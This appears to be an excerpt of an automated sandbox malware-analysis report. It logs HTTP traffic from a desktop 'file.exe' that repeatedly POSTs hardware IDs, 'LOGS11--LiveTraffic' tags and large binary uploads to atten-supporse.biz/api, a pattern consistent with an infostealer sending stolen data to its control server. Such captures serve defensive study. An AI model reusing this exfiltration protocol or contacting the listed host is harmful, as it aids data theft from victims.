                                                                                  Set-Cookie: PHPSESSID=fam5ut65e975tpv9q9s9l4pgh9; expires=Fri, 04-Apr-2025 15:21:45 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Rxl1oLEbwxp5x2OPLY7ZuAvSjxMvDDA1Q8RbDfrRdTkYUKhRwrpKe71uqsDgOAb5c19g5LTqPYtlvoz1qijkfpUeEEWqXUzOnP4gpOvhBUo%2F1Su9dIAaFDipru3OxzgCrq5%2F6YY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef81f802c3843b0-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1576&min_rtt=1565&rtt_var=610&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2845&recv_bytes=13748&delivery_rate=1760096&cwnd=32&unsent_bytes=0&cid=052aaa8feb28c891&ts=2147&x=0"
                                                                                  2024-12-09 21:35:08 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                  Data Ascii: fok 8.46.123.228
                                                                                  2024-12-09 21:35:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  3192.168.2.549707104.21.48.14432876C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-09 21:35:09 UTC278OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=S3VQX4XMY4AU
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 15047
                                                                                  Host: atten-supporse.biz
                                                                                  2024-12-09 21:35:09 UTC15047OUTData Raw: 2d 2d 53 33 56 51 58 34 58 4d 59 34 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 53 33 56 51 58 34 58 4d 59 34 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 53 33 56 51 58 34 58 4d 59 34 41 55 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 53 33 56 51 58 34 58 4d
                                                                                  Data Ascii: --S3VQX4XMY4AUContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--S3VQX4XMY4AUContent-Disposition: form-data; name="pid"2--S3VQX4XMY4AUContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--S3VQX4XM
                                                                                  2024-12-09 21:35:11 UTC1026INHTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 21:35:11 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=7ijpvadahobchfan4pd583rt1n; expires=Fri, 04-Apr-2025 15:21:49 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=VkoKGzHMHb6ceTwlc816%2BDdd9eNSNJykp4ti%2BYzegi9Z%2B2Rww5w%2FaGcisaKNf4FjpIrx2eAeTO7qOGFsX%2BingUk%2FeXJXAUKbw7NZ1YmD9N7pLTEijYOdpdqY3x220Qm1cVzE1vo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef81f965f8bf797-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1634&min_rtt=1621&rtt_var=635&sent=16&recv=20&lost=0&retrans=0&sent_bytes=2846&recv_bytes=15983&delivery_rate=1685912&cwnd=151&unsent_bytes=0&cid=fbb3dc7b60226049&ts=2298&x=0"
                                                                                  2024-12-09 21:35:11 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                  Data Ascii: fok 8.46.123.228
                                                                                  2024-12-09 21:35:11 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  4192.168.2.549708104.21.48.14432876C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-09 21:35:13 UTC280OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=8H6WZ2K2HQ3C0E
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 20549
                                                                                  Host: atten-supporse.biz
                                                                                  2024-12-09 21:35:13 UTC15331OUTData Raw: 2d 2d 38 48 36 57 5a 32 4b 32 48 51 33 43 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 38 48 36 57 5a 32 4b 32 48 51 33 43 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 38 48 36 57 5a 32 4b 32 48 51 33 43 30 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 38 48
                                                                                  Data Ascii: --8H6WZ2K2HQ3C0EContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--8H6WZ2K2HQ3C0EContent-Disposition: form-data; name="pid"3--8H6WZ2K2HQ3C0EContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--8H
                                                                                  2024-12-09 21:35:13 UTC5218OUTData Raw: 5a b5 da 68 27 0c 46 c7 33 b7 ee 57 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 75 6e 20 0a e6 d6 fd 34 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b0 ce 0d 46 c1 dc ba 9f 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d6 b9 81 28 98 5b f7 d3 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 3a 37 18 05 73 eb 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 58 e7 06 a2 60 6e dd 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 eb dc 60 14 cc ad fb 69 00 00 00 00 00
                                                                                  Data Ascii: Zh'F3Wun 4F([:7s~X`nO`i
                                                                                  2024-12-09 21:35:14 UTC1021INHTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 21:35:14 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=tpf35er89e1nnttm3ac8dugehb; expires=Fri, 04-Apr-2025 15:21:53 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p1HKer1uAzMV2xTlTCw4oN3SNo74WkcqHMxM%2Fkj9UNj6i3WIzo6FdChZX%2BqocWEJROW4jXmXVhHvUi1lpWleyTfl8DRLAyc7isG8IxqhVVgkHfd%2BA1OKSO%2FM4U2epaEHRtJSNO8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef81facff5043b0-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1627&min_rtt=1624&rtt_var=615&sent=13&recv=26&lost=0&retrans=0&sent_bytes=2847&recv_bytes=21509&delivery_rate=1769696&cwnd=32&unsent_bytes=0&cid=f9410d538cb10a7a&ts=1300&x=0"
                                                                                  2024-12-09 21:35:14 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                  Data Ascii: fok 8.46.123.228
                                                                                  2024-12-09 21:35:14 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  5192.168.2.549709104.21.48.14432876C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-09 21:35:16 UTC284OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=GRNSLLOILUIEJ2IWEAL
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 1262
                                                                                  Host: atten-supporse.biz
                                                                                  2024-12-09 21:35:16 UTC1262OUTData Raw: 2d 2d 47 52 4e 53 4c 4c 4f 49 4c 55 49 45 4a 32 49 57 45 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 47 52 4e 53 4c 4c 4f 49 4c 55 49 45 4a 32 49 57 45 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 52 4e 53 4c 4c 4f 49 4c 55 49 45 4a 32 49 57 45 41 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
                                                                                  Data Ascii: --GRNSLLOILUIEJ2IWEALContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--GRNSLLOILUIEJ2IWEALContent-Disposition: form-data; name="pid"1--GRNSLLOILUIEJ2IWEALContent-Disposition: form-data; name="lid"LOGS11--Li
                                                                                  2024-12-09 21:35:16 UTC1015INHTTP/1.1 200 OK
                                                                                  Date: Mon, 09 Dec 2024 21:35:16 GMT
                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                  Transfer-Encoding: chunked
                                                                                  Connection: close
                                                                                  Set-Cookie: PHPSESSID=0is0svv28v5b5bcofmpn0ge1re; expires=Fri, 04-Apr-2025 15:21:55 GMT; Max-Age=9999999; path=/
                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                  Pragma: no-cache
                                                                                  CF-Cache-Status: DYNAMIC
                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9cGSnYa8xsxZs5c2JZNJF7o11PzR%2Fu1ctz3WZpiTtQgOCW%2B3aFo8R6rdVW75wnt40Sqlwb5az0Pb9nAxF39WjpxvUoOC7tIRUQlb407rMChsxNMxfdv7U5ckKJP%2BsaBp5IYQkw4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                  Server: cloudflare
                                                                                  CF-RAY: 8ef81fbed82043b0-EWR
                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1653&min_rtt=1651&rtt_var=624&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2846&recv_bytes=2182&delivery_rate=1748502&cwnd=32&unsent_bytes=0&cid=a78036f7a0aec74f&ts=748&x=0"
                                                                                  2024-12-09 21:35:16 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 32 32 38 0d 0a
                                                                                  Data Ascii: fok 8.46.123.228
                                                                                  2024-12-09 21:35:16 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                  Data Ascii: 0


                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                  6192.168.2.549713104.21.48.14432876C:\Users\user\Desktop\file.exe
                                                                                  TimestampBytes transferredDirectionData
                                                                                  2024-12-09 21:35:18 UTC283OUTPOST /api HTTP/1.1
                                                                                  Connection: Keep-Alive
                                                                                  Content-Type: multipart/form-data; boundary=NPJSDEQE47W6YAPL
                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                  Content-Length: 570251
                                                                                  Host: atten-supporse.biz
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: 2d 2d 4e 50 4a 53 44 45 51 45 34 37 57 36 59 41 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 45 41 36 36 41 39 44 36 31 43 44 37 37 46 38 44 32 33 44 39 30 34 41 46 33 30 45 46 45 42 42 43 0d 0a 2d 2d 4e 50 4a 53 44 45 51 45 34 37 57 36 59 41 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 4e 50 4a 53 44 45 51 45 34 37 57 36 59 41 50 4c 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63
                                                                                  Data Ascii: --NPJSDEQE47W6YAPLContent-Disposition: form-data; name="hwid"EA66A9D61CD77F8D23D904AF30EFEBBC--NPJSDEQE47W6YAPLContent-Disposition: form-data; name="pid"1--NPJSDEQE47W6YAPLContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: eb 83 a3 60 09 cf 15 96 ac 37 8d ae e6 b7 1c c3 b3 1e f1 58 5f 14 51 ab 9b bf a7 a2 6f 0a 81 87 35 f4 8b a0 bd 8c 37 7b 56 07 18 8c 32 76 09 c9 93 53 65 e7 6a 45 18 14 08 f3 84 93 97 08 bd 1d d0 9c 10 f6 39 b5 0a 05 67 36 c0 4b 63 62 06 bc d5 30 f5 07 e6 5e 0b d6 19 fe 98 69 dd 7e 78 4a a0 b3 34 17 0b 1b 2d d9 e6 15 ef 48 79 b9 8d ba 39 35 6b 5e a5 30 53 aa bc 1a ca 88 cf 99 67 0c 27 61 8e f5 7a 3b 81 28 10 23 0d ce b6 37 e6 e4 b5 a2 3b 1f c3 5d c2 3f f7 80 17 de 62 f4 f9 b6 48 d6 41 a5 85 ae eb 14 2c 7c 5b 0c a7 ef ae c7 4d e2 66 06 ad ba 29 0d 5f 50 f1 14 95 c7 ae 5f 56 d0 4a 83 05 c9 dd c7 75 f5 33 1e 52 eb 27 d0 0d 99 19 d1 e6 d8 98 a9 f2 09 64 66 36 aa 50 94 47 47 ea 5d 1f fe a4 27 b5 27 b1 fd d3 cf 2f b8 1f a6 09 b2 0d d0 c9 a2 64 23 8c 20 d4 85 4d
                                                                                  Data Ascii: `7X_Qo57{V2vSejE9g6Kcb0^i~xJ4-Hy95k^0Sg'az;(#7;]?bHA,|[Mf)_P_VJu3R'df6PGG]''/d# M
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: e2 42 09 bc 73 64 bb 1a e5 cf 9c ab 1f a6 5a 06 17 70 29 d6 ec f4 b4 a1 ec 56 b3 20 fc 74 a4 31 3a 99 98 9c 6b a1 b1 b9 1b d4 a8 af bf 7d 5f 9d ba 80 bc 26 0d 9c 47 bd 43 1a 4d 7d 85 44 4a ad 58 a9 30 b1 6c 09 be a6 39 2c 77 71 53 db 4f 9d b2 4f 80 55 84 8f a5 df 21 27 9d 70 13 12 97 ea fe cc 14 57 1a bb 81 8d 25 70 38 95 78 25 39 5c f7 36 e2 a0 bd a3 83 5e 4f 12 f2 ab 5c 1f 74 7e 9a 4a 8e b8 7b dc bf 7a 8b ce 13 66 98 59 55 de d3 52 7f df 9d a4 d8 30 ea 86 f8 aa f6 c4 db 7d d5 7f 71 fa 3e f4 6a b2 6b 44 52 c2 e7 87 a9 9d ab ee 0f c3 89 a8 fe c7 b4 40 a1 73 ef d7 2b b9 ae bf ca f9 a6 0f 9e 9a f9 a7 e1 93 f3 8f fe a3 b8 39 a3 71 b5 74 e8 aa f3 d8 be b2 8d 1e 66 c9 80 5f c0 c7 e1 d0 b7 dc ae bc cd cf a6 06 11 37 9d 4b 43 2e 37 03 d6 c3 f2 c8 d1 dc 8a d5 d0
                                                                                  Data Ascii: BsdZp)V t1:k}_&GCM}DJX0l9,wqSOOU!'pW%p8x%9\6^O\t~J{zfYUR0}q>jkDR@s+9qtf_7KC.7
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: 3b 44 c7 b7 f6 4b dc 78 e2 ad 5e 73 d5 78 81 5d e3 bd 8a f1 5c 50 2a 59 2a 2f 28 bc 66 41 ed 1a e8 b9 ca 54 a1 de 33 9d d8 f2 b6 f1 3e ab f8 f1 c9 99 41 98 77 0c 49 dd a4 ad f2 56 09 55 7e 7b 3f 3e c9 9d 5d 39 c4 75 63 fd 20 3b e5 af c8 03 5e c5 3a db d9 86 88 c7 74 ab 72 fb 4e 51 26 b1 ed fd 90 c8 6a 97 4f 86 c5 3a 8c 48 85 d8 96 68 c3 dc 5b 11 5a d3 ec c0 de c0 31 88 11 59 80 a6 fc 92 a5 c9 ee 01 65 7b 20 43 6e 30 ae 99 a1 83 85 fb d8 34 07 50 40 07 d9 7f 13 3e 91 b8 a7 6a 54 0c 14 21 50 10 e8 11 38 5f c8 0d 7d ba d0 be bb 81 01 af 10 c2 8b 0b 34 12 c8 9f 94 f3 4c b1 99 f7 f5 b5 b8 f3 2e 1d 3b 0b 47 8f bf ae 53 d3 f7 80 e9 5e 8a 11 20 a7 23 e2 44 37 4c 41 f7 59 61 d6 07 89 16 44 f9 97 60 1c 6c 63 ad f4 6c 78 98 d7 b1 e6 54 4a 77 9f 3e aa bb 9a a8 88 1a
                                                                                  Data Ascii: ;DKx^sx]\P*Y*/(fAT3>AwIVU~{?>]9uc ;^:trNQ&jO:Hh[Z1Ye{ Cn04P@>jT!P8_}4L.;GS^ #D7LAYaD`lclxTJw>
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: e6 c6 19 a8 80 ab d9 08 92 3e 29 7a 33 fc 31 71 e9 54 97 4d 9b 02 89 a6 09 74 5c 59 9f 79 4e 71 eb e9 83 b8 56 9b ba 80 1e 6c d6 01 69 99 dd dd fe 2d 29 6a 5b 9f 96 c1 5f dc ad 82 6b 46 a4 f6 3d 99 79 c6 13 d0 c3 af e4 2a 7f 62 d1 a6 c0 d4 a5 a2 95 9a 9a 0a 1f a9 77 fb a2 78 ed 2e c0 ba ac 52 fc 4f 87 df 19 6a b6 69 0b 82 76 5e 23 52 7d bd a0 3f c4 99 26 3e 5b f8 c5 9d 3d 49 68 ef 09 52 60 36 3c 81 64 07 e1 bb 98 99 11 46 e0 1c f3 ab a5 73 b6 1f 76 11 e0 b7 9e 0a 4a ae f3 eb 40 67 aa b0 9d fa 1e 5c 32 cd 73 17 e4 e0 22 b6 c3 3f 43 06 ae e4 52 94 67 27 1e 4a 6a 86 6b a8 5e f4 1a 9c b5 aa f1 4c 2b c0 3d aa 99 19 f3 7b ee 13 35 d6 04 e6 06 13 c8 23 63 f9 cd c4 9d c1 13 c5 38 3b 87 f7 cb 5b e6 88 ea 8d fb 99 ce 27 af 8c a5 2d 5c 18 f0 e9 6d 70 d4 b3 c1 4e 5e
                                                                                  Data Ascii: >)z31qTMt\YyNqVli-)j[_kF=y*bwx.ROjiv^#R}?&>[=IhR`6<dFsvJ@g\2s"?CRg'Jjk^L+={5#c8;['-\mpN^
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: a1 85 98 db 93 57 f9 41 d7 1c b7 ad 8d d8 f6 ed 9e ed 09 40 e6 e5 18 02 d6 d0 46 f0 67 4b a7 a0 8f e1 f0 99 06 c4 03 24 26 28 e0 31 38 99 cf 9a 77 fe 3e 30 c9 67 33 3b 4b 7a fb 35 6a a4 2f 37 fc cd 7a 43 2b 33 e5 e3 5e f9 43 2a cf 3f bc fb 0b 49 57 ee 9f c4 df 0d 83 02 ff 19 8f 6c c3 02 1b c1 9d f4 b5 04 d8 c4 d0 42 71 61 ba bf 0c b5 d8 f8 07 94 3b 98 d0 75 f5 01 08 98 de e2 ab a1 5d ec 0f f3 e9 3c 48 92 51 e6 ce f0 94 9e c7 03 ff e5 47 61 24 55 1e 9e 37 fc 78 3b ee 8c 83 18 4c ff 6d 5e 0f 2c 88 e2 35 dd 9a 02 fc 15 3d 6f d0 6d 37 27 0b 5b 45 cb 00 b4 fd 00 f1 ce 69 26 58 f8 62 ad 8d f1 20 86 25 82 b1 23 ba 99 0e 2f ee 4f 5b c6 b7 86 19 98 19 39 14 cf 7d 92 bd 61 ae 61 0f 8b f2 ef 62 df 90 2e 78 4a 01 5b 4a 8c 0e 9f b6 02 e1 c1 50 f9 fd c4 b4 64 78 84 7b
                                                                                  Data Ascii: WA@FgK$&(18w>0g3;Kz5j/7zC+3^C*?IWlBqa;u]<HQGa$U7x;Lm^,5=om7'[Ei&Xb %#/O[9}aab.xJ[JPdx{
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: 5d a0 c1 15 ec 05 f5 a1 f0 86 8a 72 86 aa 51 71 0f 71 33 0f 49 04 e1 ca 9c cf 3c b6 83 14 de e5 5b 85 ea f3 3c 5c c5 db 89 c3 d5 69 c9 2b 89 a1 e6 a9 51 b6 01 b4 a5 17 5d 92 36 04 45 9a ad b9 70 cc d3 b0 c5 4b ae 50 cd 52 76 bb 13 4a af 7f de 9d cf 14 c7 37 17 34 cd 9f 9b dd ee 6c 66 e8 b0 d4 6c 86 37 44 6f 4d 95 9b b6 b0 df bd d2 48 78 25 5f 79 ea 37 eb 49 cb 66 83 ff f0 41 52 c7 2f 37 2e a7 b9 94 90 94 39 6e 9d 0c 7d 60 be 02 fd 8b 5b e4 cd 1e 29 7c aa 57 6a 63 7e ff 28 c0 ed 62 8c c8 8c 10 d3 78 36 6c 67 2f 8f d5 0c bc 2b ff 63 bc b0 ab 73 54 18 45 d2 07 7e 72 44 a2 f4 c6 64 4b 21 48 f0 30 c6 6d 3c 64 7f e4 7f 99 8b c1 98 f0 15 72 16 0b 85 b7 bf 6e 6c ae 2c 16 76 09 bb 41 f4 e3 fa 5f e2 35 59 93 5c 57 83 c5 f1 f1 73 b4 12 9e a4 63 04 15 01 2a 6e f7 e7
                                                                                  Data Ascii: ]rQqq3I<[<\i+Q]6EpKPRvJ74lfl7DoMHx%_y7IfAR/7.9n}`[)|Wjc~(bx6lg/+csTE~rDdK!H0m<drnl,vA_5Y\Wsc*n
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: 2d 70 aa 1f af b6 e9 42 7f 32 a8 fa a6 e9 68 c9 b7 75 13 f3 c2 d5 70 2a ee 5a c3 a5 b4 0c fe e2 82 3a b5 6b af 00 a8 df af 30 41 d2 99 ac e5 cd a6 01 21 39 61 30 a3 a6 32 b5 77 27 5f a9 c9 34 3a fd 2d 76 59 25 72 74 20 d4 98 55 5c 11 04 b0 d8 33 af 85 26 cd 8c 44 97 bd 75 c7 2a d7 f3 10 fd 2f 2b fb 72 bc 6d b8 d5 3f 9f 69 74 37 6f 62 fe b7 c4 42 38 2a 3c e5 35 a0 07 1f 8e 6d 8b fb ce 79 66 b1 d7 28 fc 66 d7 7b 0e c9 ac 8c cd 49 fc 97 70 68 c7 6e e6 cc b3 19 af 1b 10 a5 6c c7 76 99 fe 94 aa 83 4f 42 c9 46 ef 00 c5 c9 5e 0f 0d a4 11 38 ec c9 99 8c 10 a1 ab da ed 43 d7 fc 6f 61 df 9f f7 ec 24 c4 47 10 18 7a 75 48 f2 e5 1e 21 27 11 bd f2 26 74 7f a0 10 63 af db 73 8b a5 6f b7 27 ae 16 dc 4e 6f 6f 39 ee 15 ac 90 6a 73 c6 56 1a 3b 2f 0d 7a 75 a3 0d 2e 9e 45 92
                                                                                  Data Ascii: -pB2hup*Z:k0A!9a02w'_4:-vY%rt U\3&Du*/+rm?it7obB8*<5myf(f{IphnlvOBF^8Coa$GzuH!'&tcso'Noo9jsV;/zu.E
                                                                                  2024-12-09 21:35:18 UTC15331OUTData Raw: c7 7e 93 89 94 3b 0f c9 a4 92 3a 58 48 2e 72 fe cb 6d bc d2 b8 d0 eb 1e ca e1 c4 38 6b 6a d7 90 3a d3 11 5b 48 d4 1b 5a b9 47 60 ff b3 9a 31 3d 7e b5 cc 65 32 99 14 4b 36 15 49 f7 6f e8 95 4f 32 00 64 13 8c bc e2 14 e7 8a f2 74 e0 f9 dc 0e 49 d1 43 ea e8 19 c7 fe 02 4a 77 2d ef f5 21 23 3a 39 90 23 b1 f9 7c 6f b7 8a b1 2a 21 a5 31 53 d9 19 49 dc f3 20 4a 78 33 ec 05 b1 bb 96 3f 31 fa b8 03 a9 43 1a c2 96 bc f4 38 80 f0 c2 2f 61 0a 72 31 30 b8 4a 45 48 ae 36 fe 78 73 93 ff 08 44 57 1f 67 b6 86 e9 75 55 1c e7 d5 a2 80 f0 d6 35 e6 08 18 c3 75 0b 82 8e 95 47 75 3f 18 a3 cd fd 12 c2 f8 9a 65 59 5a c1 ee bb 41 a0 ee fc 78 12 07 da ce bb 9b 36 e8 9e ea 6c 0c ee 5c c9 c7 72 98 2a 75 8a 3a a4 92 a1 fb b1 02 e9 28 74 76 eb 7f 79 e2 4f 34 3c 42 fe 7f 90 d9 59 d0 6f
                                                                                  Data Ascii: ~;:XH.rm8kj:[HZG`1=~e2K6IoO2dtICJw-!#:9#|o*!1SI Jx3?1C8/ar10JEH6xsDWguU5uGu?eYZAx6l\r*u:(tvyO4<BYo
